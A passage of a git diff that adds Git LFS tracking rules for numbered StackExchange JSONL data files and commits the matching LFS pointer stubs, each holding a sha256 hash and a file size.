diff=lfs merge=lfs -text +data/stackexchange/1-1/835_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/836_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/837_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/838_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/839_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/83_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/840_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/841_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/842_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/843_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/844_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/845_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/846_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/847_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/848_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/849_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/84_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/850_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/851_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/852_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/853_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/854_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/855_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/856_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/857_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/858_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/859_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/85_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/860_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/861_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/862_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/863_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/864_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/865_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/866_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/867_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/868_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/869_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/86_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/870_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/871_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/872_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/873_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/874_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/875_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/876_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/877_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/878_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/879_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/87_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/880_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/881_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/882_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/883_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/884_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/885_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/886_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/887_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/888_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/889_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/88_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/890_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/891_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/892_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/893_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/894_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/895_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/896_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/897_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/898_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/899_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/89_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/8_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/900_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/901_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/902_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/903_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/904_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/905_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/906_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/907_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/908_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/909_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/90_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/910_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/911_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/912_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/913_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/914_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/915_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/916_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/917_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/918_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/919_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/91_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/920_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/921_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/922_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/923_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/924_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/925_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/926_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/927_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/928_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/929_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/92_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/930_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/931_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/932_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/933_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/934_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/935_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/936_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/937_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/938_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/939_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/93_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/940_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/941_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/942_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/943_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/944_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/945_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/946_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/947_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/948_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/949_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/94_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/950_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/951_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/952_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/953_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/954_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/955_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/956_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/957_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/958_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/959_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/95_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/960_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/961_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/962_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/963_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/964_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/965_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/966_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/967_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/968_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/969_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/96_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/970_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/971_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/972_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/973_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/974_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/975_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/976_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/977_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/978_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/979_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/97_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/980_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/981_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/982_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/983_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/984_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/985_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/986_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/987_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/988_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/989_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/98_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/990_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/991_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/992_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/993_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/994_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/995_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/996_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/997_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/998_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/999_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/99_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/9_2289.jsonl filter=lfs diff=lfs merge=lfs -text diff --git a/data/stackexchange/1-1/0_2289.jsonl b/data/stackexchange/1-1/0_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96c873c4b2d4c19a63dac01204a566373bb6cfb4 --- /dev/null +++ b/data/stackexchange/1-1/0_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ee6642fa41a2581efa4b38670a3e8e21779c848a5eb38f310c63d9e928f0df2 +size 35607549 diff --git a/data/stackexchange/1-1/1000_2289.jsonl b/data/stackexchange/1-1/1000_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db97be61fa2d1fff710018d0168aa7fedb5843e2 --- /dev/null +++ b/data/stackexchange/1-1/1000_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8518100fab3c28c922faa695bb771c44b4ffe5c04127c3466ccb0a16b486cdd +size 35130869 diff --git a/data/stackexchange/1-1/1001_2289.jsonl b/data/stackexchange/1-1/1001_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f672f836c38df13dcf74b0c6b9efe206a65e7a70 --- /dev/null +++ b/data/stackexchange/1-1/1001_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:28235bf636fc4278ba0635f2b16706e7ef453502bfe41f567660122e5112627c +size 35147569 diff --git a/data/stackexchange/1-1/1002_2289.jsonl b/data/stackexchange/1-1/1002_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bcee4fbbc2413e2a7e65801520f2b6557bc1b70f --- /dev/null +++ b/data/stackexchange/1-1/1002_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a6fc485eb06ae5ea7b1a9a87d20da503ef96b846cdc21f8eae5d7431f3720de9 +size 35055186 diff --git a/data/stackexchange/1-1/1003_2289.jsonl b/data/stackexchange/1-1/1003_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c6d8722525bd5b0da4f7d69faafb757f6ca4641 --- /dev/null +++ b/data/stackexchange/1-1/1003_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:857d0af9d20ad9aae001715abf725e252233e38cd09ad95d1a48e41652c6c528 +size 35619521 diff --git a/data/stackexchange/1-1/1004_2289.jsonl b/data/stackexchange/1-1/1004_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d5eefe963e8de45b24865d07914d0385acecbbc --- /dev/null +++ b/data/stackexchange/1-1/1004_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c799029ad46fb4fb0d27cbff53b0e1f18662081d122a954e6268add9f7d0c746 +size 35376973 diff --git a/data/stackexchange/1-1/1005_2289.jsonl b/data/stackexchange/1-1/1005_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95a01dc6469fc9b09d36428ff8b2bf41affcf6c7 --- /dev/null +++ b/data/stackexchange/1-1/1005_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5bfd34f292846c6bfc37187fd6689ecf436688211b38f06faede1ba52c71a4c5 +size 35152769 diff --git a/data/stackexchange/1-1/1006_2289.jsonl b/data/stackexchange/1-1/1006_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5490882eaef5ba14a9c0f4e259d8834ce67d2260 --- /dev/null +++ b/data/stackexchange/1-1/1006_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3cdcda8fa07b8db83e87721c117a460c11ed3990c39aabfe6a6474b3bed9133 +size 35512543 diff --git a/data/stackexchange/1-1/1007_2289.jsonl b/data/stackexchange/1-1/1007_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c70d24c30b00e6e824e36e06a1594e9e4825bc7d --- /dev/null +++ b/data/stackexchange/1-1/1007_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fda3a1ecbd362c7b6a4bee29d7cc7946240b2b6826116beeda1e549fe557d3fa +size 34262610 diff --git a/data/stackexchange/1-1/1008_2289.jsonl b/data/stackexchange/1-1/1008_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5270030fa0324192be7c0207ffa3e03235e389af --- /dev/null +++ b/data/stackexchange/1-1/1008_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1bc498eb5959ed140a4efb335edb01c395eca346734c93f6faa90ed430311103 +size 35210300 diff --git a/data/stackexchange/1-1/1009_2289.jsonl b/data/stackexchange/1-1/1009_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..873507cbfe950213055846ecb324f6f685379e10 --- /dev/null +++ b/data/stackexchange/1-1/1009_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d899daee513727fc48021a25ba77354b25651d8a78b2307b59d70fc1074b60aa +size 34943572 diff --git a/data/stackexchange/1-1/100_2289.jsonl b/data/stackexchange/1-1/100_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8265d89019e186e117854c63ee43364a164f3b1c --- /dev/null +++ b/data/stackexchange/1-1/100_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a2de1d5701c61745422fe34a40326b72eca3c6cb3816a3bcaae5bc7bb708a89 +size 34282494 diff --git a/data/stackexchange/1-1/1010_2289.jsonl b/data/stackexchange/1-1/1010_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1144168a6eb5d462ba30b8336b33a706e0d7497 --- /dev/null +++ b/data/stackexchange/1-1/1010_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:137b9fcfc59dfa98fb8bf1cf17b361fe00706b11fc5e1863edf80b63221c3862 +size 34770499 diff --git a/data/stackexchange/1-1/1011_2289.jsonl b/data/stackexchange/1-1/1011_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f30f6b2a93fec0e39e8a539c3eff2d037e265bb --- /dev/null +++ b/data/stackexchange/1-1/1011_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6eb2c0a47ed839dcd7a9be3fa927d587afe8e8ccf987e77491f5dd406999d920 +size 35431846 diff --git a/data/stackexchange/1-1/1012_2289.jsonl b/data/stackexchange/1-1/1012_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c35f4d59790e9c08108a5e27fd7ea2cd9620d4af --- /dev/null +++ b/data/stackexchange/1-1/1012_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80c72ecae4e6e00c523c88f8ef4b19ab280c71f3fca80df38759c847d6adf04a +size 34761965 diff --git a/data/stackexchange/1-1/1013_2289.jsonl b/data/stackexchange/1-1/1013_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf7d3f939ddd4af9312c9ef9eed04710a0b41ea0 --- /dev/null +++ b/data/stackexchange/1-1/1013_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:087f85503153f0c2b450ad947cf5520109bfefcdbb4bde83f57341ad1b5b4d59 +size 35275615 diff --git a/data/stackexchange/1-1/1014_2289.jsonl b/data/stackexchange/1-1/1014_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a151175f7ff21438b8048bc72a75a7a14e81c0e5 --- /dev/null +++ b/data/stackexchange/1-1/1014_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15c1d49dd26a054348ed025d3c720150add3df8f680a8fa8adbce32dd290093e +size 35277658 diff --git a/data/stackexchange/1-1/1015_2289.jsonl b/data/stackexchange/1-1/1015_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a3804ee1e77c5229115a493321c1e63e6566587e --- /dev/null +++ b/data/stackexchange/1-1/1015_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c187720018b173ace4adc6204e9c50da2ebe12f0608411feb34cbcd60c23d45 +size 35239387 diff --git a/data/stackexchange/1-1/1016_2289.jsonl b/data/stackexchange/1-1/1016_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26c2601acb0acd41917ecad12921cb9bafe49206 --- /dev/null +++ b/data/stackexchange/1-1/1016_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8abf76257bed54018c1ccaf56a68e101f88e348ecfb197ac0120fc6a5d56660f +size 35309781 diff --git a/data/stackexchange/1-1/1017_2289.jsonl b/data/stackexchange/1-1/1017_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25ac6024501e3da32be56abe5e6f78a6ea2f87a0 --- /dev/null +++ b/data/stackexchange/1-1/1017_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:095f6540341fc452d94d493e6bf7ab32d1302755fb522f3aff767e82de2f4a18 +size 35436783 diff --git a/data/stackexchange/1-1/1018_2289.jsonl b/data/stackexchange/1-1/1018_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d0a76ae4c829292662bff502098de5cfedf9940 --- /dev/null +++ b/data/stackexchange/1-1/1018_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7e47e63995a8fee1546dc3d1d883a3cfb2cbbf6fae6367605386c00d980c489 +size 35524178 diff --git a/data/stackexchange/1-1/1019_2289.jsonl b/data/stackexchange/1-1/1019_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c496c6ec663eed126341b188d04cd38f2a355e93 --- /dev/null +++ b/data/stackexchange/1-1/1019_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6e3abd9c6dc136180f43915656a5845e0270ef66c432aabc47ae2cec746f8eb +size 35212522 diff --git a/data/stackexchange/1-1/101_2289.jsonl b/data/stackexchange/1-1/101_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4bcc9d2df3f617c4d65a9a45f8998d47530f6f23 --- /dev/null +++ b/data/stackexchange/1-1/101_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c12302eaf4e8730ef41b63761f14893a4161c106cd38ae91b505132487e6a92b +size 33958940 diff --git a/data/stackexchange/1-1/1020_2289.jsonl b/data/stackexchange/1-1/1020_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ac1b69a90276eb31392ef30c8381e576ddbd751 --- /dev/null +++ b/data/stackexchange/1-1/1020_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12a96356b349d898ef06c3634e46af50f1be443e890506de75ff3149b9674594 +size 35779716 diff --git a/data/stackexchange/1-1/1021_2289.jsonl b/data/stackexchange/1-1/1021_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1850119bcc8c13c82bfa744e5634dd75c0a1844a --- /dev/null +++ b/data/stackexchange/1-1/1021_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:600f7b6f4dee44945c25ad3d1c0348205baae2b514e1c5b1c16b2be2dfe69dd5 +size 34850713 diff --git a/data/stackexchange/1-1/1022_2289.jsonl b/data/stackexchange/1-1/1022_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f791f37fca640b157ef18720742b56042bc3e16 --- /dev/null +++ b/data/stackexchange/1-1/1022_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4043f12bfae7d8e8da0da73947204abd996c70b1d18a01f598d2209009c713c4 +size 34749622 diff --git a/data/stackexchange/1-1/1023_2289.jsonl b/data/stackexchange/1-1/1023_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1983a1c45befcb12581fa5c2913d2095a7acecf --- /dev/null +++ b/data/stackexchange/1-1/1023_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f0e732e5d67e1a6df0043f8a9e7515d41fbc417c78f1dfab63aff76707290d6 +size 35268842 diff --git a/data/stackexchange/1-1/1024_2289.jsonl b/data/stackexchange/1-1/1024_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f5a7114a9a670f17f6063c09b8024792e0a4e9f --- /dev/null +++ b/data/stackexchange/1-1/1024_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f531f5e911eb693e6e43c5f03ea24f090c1ab1eb6fd601d1ae18b0455e74d0e +size 35354026 diff --git a/data/stackexchange/1-1/1025_2289.jsonl b/data/stackexchange/1-1/1025_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da11998106f9b438c287912b3f4538dfda931459 --- /dev/null +++ b/data/stackexchange/1-1/1025_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:980300660a9c8d589514d2ac8ced2df016f1a07cfaab80b3ea91d67bd9b70601 +size 34868215 diff --git a/data/stackexchange/1-1/1026_2289.jsonl b/data/stackexchange/1-1/1026_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..087f4351db650e72b120647fa9177086a9d8a7af --- /dev/null +++ b/data/stackexchange/1-1/1026_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc0870a0f70c13efb0ee4bed2d6fe9e130fbf83aa820745d80e6e0d0bed29ee4 +size 35007474 diff --git a/data/stackexchange/1-1/1027_2289.jsonl b/data/stackexchange/1-1/1027_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec0b435966ab723c6396039075f1a6c4910f0baa --- /dev/null +++ b/data/stackexchange/1-1/1027_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c697733e8fb5558eb2d783440be50a77b310c73aee0dbdd6ae0456cbdee27bf8 +size 34915186 diff --git a/data/stackexchange/1-1/1028_2289.jsonl b/data/stackexchange/1-1/1028_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21d0d2220f0327a0785d3792a86a26e802c4bacc --- /dev/null +++ 